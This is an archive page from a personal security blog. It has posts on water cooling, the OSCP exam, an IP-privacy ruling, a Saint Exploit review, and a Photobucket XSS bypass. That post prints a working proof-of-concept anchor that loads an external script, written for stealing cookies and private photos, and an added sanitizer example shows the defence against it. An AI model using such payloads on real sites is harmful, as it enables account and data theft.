Joey Adams Dot Net

Southern Fried Programming


Update

I haven’t posted much in a while; this is mostly due to my taking a break from the industry and giving myself a summer to relax. I am still in touch with most people and watch industry news, however.

I was supposed to speak at ToorCamp this year; however, due to financial reasons, I will not be making it.

I will be back in the mix and attending the state DEF CON user group in July, so look for much more activity in July and August, as I have much planned in terms of speaking, videos, articles, and more insight into what is going on. Feel free to contact me until then.

My thoughts on pc water cooling

I have had a water-cooled CPU via a nice Koolance case, with the reservoir, pump, radiator and controls all mounted on top of the case, and it ran for a good 2 or so years without too much trouble.

The only 2 troubles I had came from my own complacency in not doing regular maintenance, so water levels dropped a bit.

Recently my PC started shutting off randomly. I first checked the water levels, since they were the culprit in the past; however, I noticed something else this time around. Apparently I had a leak at the water block, and it was seeping through little by little onto my mobo and VGA cards. This was not a HUGE issue, since I use a mixture of distilled water and Water Wetter as a glycol additive.

However, after cleaning the board and the cards, it seemed it wasn’t done. After taking out two of my cards, it then took the board with it. I got pretty scared of losing other components, so I yanked the board and tried to bench it, and it failed horribly.

New board, single VGA solution, and air cooling parts are on the way.

Now for the real meat of this post, my thoughts. Water cooling, when done correctly and maintained regularly, can be very good looking and can offer a distinct advantage in the cooling department. However, the maintenance is tedious: if you have a water-cooled computer, you should be cleaning all blocks, blowing out the radiator, checking fans, and flushing your system at least twice a year, and checking water levels once a month.

This work is all fine and dandy, but it’s the middle work and the risk where I find the problem. If a component dies, disassembling the water cooling system to access some components can be a pain, even in a well-designed full tower case. The risk is trivial to state: you have a leak, or develop a leak; the leak slowly builds over time and goes unnoticed; you lose vital components. It doesn’t matter what you are cooling with, liquid will seep into all the crevices of your components and either short or burn them. The glycol additives out there really make things worse by saturating everything deeply.

My advice on water cooling: if you are constantly moving/changing/upgrading your PC, then it may be for you. If you are a workhorse who leaves his PC on forever and uses it for business, then I would highly suggest going with an air solution. Great air coolers are about $30 these days.

New PGP Key

Take note of the new PGP key on my Contact page if you want to contact me in a secure manner.

You can also find the key on the MIT and pgp.com keyservers.

Marine-One Specs Compromised

I’ll make this one short, but apparently the blueprints and specs of Marine One, the president’s helicopter, ended up on a file sharing network after an employee of a defense contractor installed a P2P client that added files from the computer to the shared library; on that computer were the blueprints and specs.

Why would such sensitive data be stored on employee workstations, and why should these workstations even be connected to the internet?

Offensive Security 101 Wrap-up

I took my exam for my OSCP last weekend, and I have to admit that, even though I didn’t have too many problems throughout the course, I was nervous going into the exam.

Like an idiot, I partied the day before the exam and woke up 2 hours after the starting time. I had read some advice that really helped out during the exam, which was to take your time, think about things, and come back to them. I treated the day pretty nonchalantly: when I got stuck on something, I would move on to the next thing. If I was at a standstill with everything, I would go watch some television and just relax and clear my mind. Things slowly fell into place and I was able to complete the exam 100%.

As for reviewing the exam, if you are in the security industry, or are just interested in aspects of offensive security, you should do yourself a favor and take this course. I had a fair bit of knowledge before going into it, but after this course I am capable of so much more, and really feel as if I have a grip on things.

You really cannot understand how amazing a course it is until you take it, and I promise you the $500 is a complete and utter steal for what you will learn and have access to.

Oh… and try harder…

Ontario Court on IP Address Resolution

I’ll start by saying the obvious: I am not a lawyer. Everything you may or may not read is my opinion as a hacker and programmer, and I feel that, being on both sides of the wall, I have a good understanding of the expectation of privacy on the web.

The first question everyone should ask themselves is: would it be OK if someone, whether the police or your next door neighbor, was able to see what you are doing on the internet?

I will attempt to keep the analogies to a minimum, because I feel they are better suited for ‘dumbing’ things down; when used in intelligent conversation they are often a misdirection, a trick to get you thinking about a different issue and applying those thoughts to the issue at hand without thinking it through.

The court stated that an IP address is in the public domain and that when you are online you do not have a reasonable expectation of privacy. The issue with this is, if this information is in the public domain, then can I call my ISP and ask them to give me the name/address of the customer that had IP address x at time y? No, of course not.

Your IP address is a routing agent, and that alone. It does not identify you with your ISP; your personal information does. In many cases you have a dynamically assigned IP address that changes between initializations with your ISP. Everyone should stop looking at this as being about the IP address.

Wake up, make coffee, break photobucket xss filters.

UPDATE:
Photobucket Developers are aware of the issue and the holes are being closed as you read this.

This morning, while uploading a photo to Photobucket, I noticed they had added a comment system. All I could think was that they had to have secured this after all the old mishaps they had with leaking info.

After 5 minutes, I found I was wrong. They forbid you from posting links; however, if you look at the default comment added by the user ‘photobucket’, there is clearly a link in there. Maybe it is hardcoded, and maybe they do not filter comments from that privileged user, but that is not the case. By simply adding the URL from the posted link, your anchor becomes valid, sort of. By using inline JavaScript, making a dummy variable containing this link, and creating a simplistic egg loader to grab an external JS file, you can effectively escape all filtering.

Using this, one could steal cookies, or use AJAX to grab a list of photos in the victim’s account, private or not.

I would contact them, but I looked for literally 10 minutes and could not find a viable contact option.

PoC below with loader:

<a href="javascript:
var d = 'http://s365.photobucket.com/albums/oo92/photobucket/?action=share';
var s = document.createElement('script');
s.src = 'http://bin.joeyadams.net/a.js';
document.body.appendChild(s);
void(0);
">test</a>

PS: There is also a way to auto-fire this ;) but I’ll let you find that.
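The bypass above appears to work because the comment filter looks for a permitted link string rather than checking what scheme the href actually resolves to. As an added example, not code from the original post or from Photobucket, here is a JavaScript allowlist check that rejects javascript: and every other non-http(s) href in user comments, including the whitespace and case tricks browsers tolerate; the function names and the sample comment are constructed for illustration.

```javascript
// Added example (not from the original post): allowlist check for anchor hrefs
// in user comments. Function names and the sample comment are constructed.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Browsers strip ASCII tab/newline anywhere in a URL, and leading/trailing
// C0 controls and spaces, before parsing, so "java\tscript:" still fires.
// Apply the same normalisation so the value we check is the value we emit.
function normalizeHref(raw) {
  return String(raw)
    .replace(/[\t\r\n]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

// True only for an absolute http(s) URL. Relative URLs and every other
// scheme (javascript:, data:, vbscript:) are rejected, whatever their case.
function isSafeHref(raw) {
  let url;
  try {
    url = new URL(normalizeHref(raw)); // throws on relative URLs and garbage
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(url.protocol); // protocol is already lowercased
}

function escapeAttr(s) {
  return s.replace(/[&"<>]/g, (c) => ({ "&": "&amp;", '"': "&quot;", "<": "&lt;", ">": "&gt;" }[c]));
}

// Rewrite <a href="..."> tags in a comment: safe links are kept with an
// escaped href and rel="noopener nofollow"; anything else is reduced to its
// visible text, so a javascript: anchor never reaches the page as a link.
// The rest of the comment markup still needs the site's general HTML sanitizer.
function sanitizeCommentLinks(html) {
  const anchor = /<a\b[^>]*href\s*=\s*(["'])([\s\S]*?)\1[^>]*>([\s\S]*?)<\/a>/gi;
  return html.replace(anchor, (m, q, href, text) =>
    isSafeHref(href)
      ? `<a href="${escapeAttr(normalizeHref(href))}" rel="noopener nofollow">${text}</a>`
      : text);
}

// Constructed sample: one allowed link, one javascript: anchor shaped like the PoC above.
const SAMPLE_COMMENT =
  '<a href="http://example.com/?a=1&b=2">ok</a> <a href="javascript:\nvar s=1;">test</a>';

console.log(sanitizeCommentLinks(SAMPLE_COMMENT));
```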

I dub thee VIIRP (Viral Information Integrity Reflective Poisoning)

The link at the bottom explains it all. The title is just a joke, since all cool things must have a buzzword.

What seems to have happened is that media sources used information taken from an unapproved edit of a Wikipedia article about someone, an edit which had added false material. Once the wiki edit was challenged, Wikipedia found information about the subject on said media source, which had taken its info from the falsified wiki entry.

The loop closes itself and makes itself true.

An attack vector? No, haha. In the future, when integrity checking systems are autonomous and use spiders to collectively judge the authenticity of a piece of information, a viral reflective infection, in which outlets mirror data from a source that mirrors a malformed entry on a reputable site, could cause some dismay in web trust. And if you think there is any trust between web services, you shouldn’t be touching a piece of code. I, for one, do not even trust static data coming from an integrated application I coded myself, let alone allow 3rd-party information to be dynamically leaked at will.

A good visualization of a future vector for attack is RSS feed synchronization between unaffiliated sites. I’ll go ahead and coin this attack STIRTS, or Spanning Tree Infection of the Replication of Trusted Syndication. hahaha

“One feed, to infect them all” ??? I know, I know.

Link: http://tech.slashdot.org/article.pl?sid=09/02/10/2211220&from=rss
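The loop the post describes, as an added example that is not from the original post: a toy provenance check in JavaScript that only credits a record when some citation chain reaches a primary source without routing back through the record itself. Record ids and the sample graph are constructed to mirror the Wikipedia incident, with an RSS repost included for the syndication scenario above to show it inherits the same lack of support.

```javascript
// Added example, not code from the original post. Record ids and the graph are constructed.
// graph: record id -> array of ids that record cites. An empty array marks a primary source.
function provenance(graph, claimId) {
  const seen = new Set();
  const primary = [];
  let loopsBack = false;

  const walk = (id, depth) => {
    if (id === claimId && depth > 0) { loopsBack = true; return; } // chain returned to the claim
    if (seen.has(id)) return;                    // already explored; also ends other cycles
    seen.add(id);
    const cites = graph[id];
    if (cites === undefined) return;             // unknown source: earns no credit
    if (cites.length === 0) { primary.push(id); return; }
    for (const next of cites) walk(next, depth + 1);
  };

  walk(claimId, 0);
  return { supported: primary.length > 0, primary, loopsBack };
}

// Constructed sample mirroring the incident above: the false edit is copied by a
// news article, and the edit's defenders then cite that article. An RSS repost of
// the article is added for the syndication scenario; an honest chain for contrast.
const SAMPLE_GRAPH = {
  wiki_edit:     ["news_article"],
  news_article:  ["wiki_edit"],
  rss_repost:    ["news_article"],
  honest_story:  ["press_release"],
  press_release: [],
};

for (const id of ["wiki_edit", "rss_repost", "honest_story"]) {
  console.log(id, provenance(SAMPLE_GRAPH, id));
}
```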

Final Week: Offensive Security 101, 1 week to rest

I just finished my last day of the Offensive Security 101 course and am so glad I took the time to take it. The amount of knowledge I have gained alone is easily worth triple the cost of the course, and the contacts and networking gained are untouchable.

This is my week of relaxation before my OSCP exam next Saturday. In the down time, I think I’m going to install Debian onto my computer, with e17 and xinerama. It will give me something to do, and I’m sure there will be a good bit of headaches along the way to keep me entertained.

Debian/e17/xinerama install notes to come soon.
Test results next Sunday.

EOW2: Saint Exploit Review

It is the end of week 2 of my Offsec 101 course, and I am still learning a ton. I went ahead and sent in for my demo of Saint Exploit, which is one of the perks you get for taking the course. I will review the other when I receive it.

My first thoughts, before using Saint Exploit, were that it was a huge package and had a lot of overhead. I generally dislike web-interfaced programs that have nothing to do with configuration, management, or manipulation of web applications; however, this was an exception.

I have a limited address allowance (10 IP addresses), so I compiled a list of a few questionable work computers and my home addresses. I am at work now and had my EEE with me, so I booted it up, ran Saint Exploit, and added my generated key to the application.

Next I selected which hosts from the key file I wanted to perform penetration tests on. After that it is all about watching and waiting while it automates the penetration testing life cycle on each host.

At the end of the testing, it presents the results in a detailed format, with their impact, as well as the exploits that succeeded and their CVEs.

Testing by hand, I could not penetrate one of the PCs yesterday; however, Saint Exploit did so, surprisingly by a weak password and an exploit. The exploit used was one I thought the system was vulnerable to, but I could not get Metasploit or any exploit code to execute correctly on it. This, my friends, is the difference between open exploit code and commercial-grade exploit code.

I do not think I will be getting a license for Saint Exploit, the first reason being that I’m broke; however, I would recommend it in a heartbeat to any serious penetration tester or auditor who could afford a license.

Addendum:

I didn’t realize how much it sounded like I was bashing the Metasploit team. I don’t proofread my articles, as I’m sure anyone who’s read any of my posts can tell, haha.

Turns out, it was not the Metasploit module that was giving me problems, it was my own brain. The module I was working with, which I had suspected the server was vulnerable to, was the msdns_zonename exploit. After some enumeration, I attempted the Metasploit exploit on the different ports I was suspicious of, and it never succeeded.

Had I just stfu and let Metasploit do what it does and run an automatic check :), I would have seen that it enumerated a port I did not find in my scans and successfully exploited it. I learned a pretty valuable lesson in not trusting myself, and in port scanning beyond the basic common ports, as I believe the vulnerable DNS RPC service is randomly bound to a high port, above 1024 or something like that.

Nevertheless, I think Saint Exploit and other such tools, like CI, and scanners like Nessus, serve their purpose but should not be relied on. My thinking is that if you can afford an SE/CI license, then doing a starting/finishing scan with these products, along with manual testing, would make sure no stones are left unturned.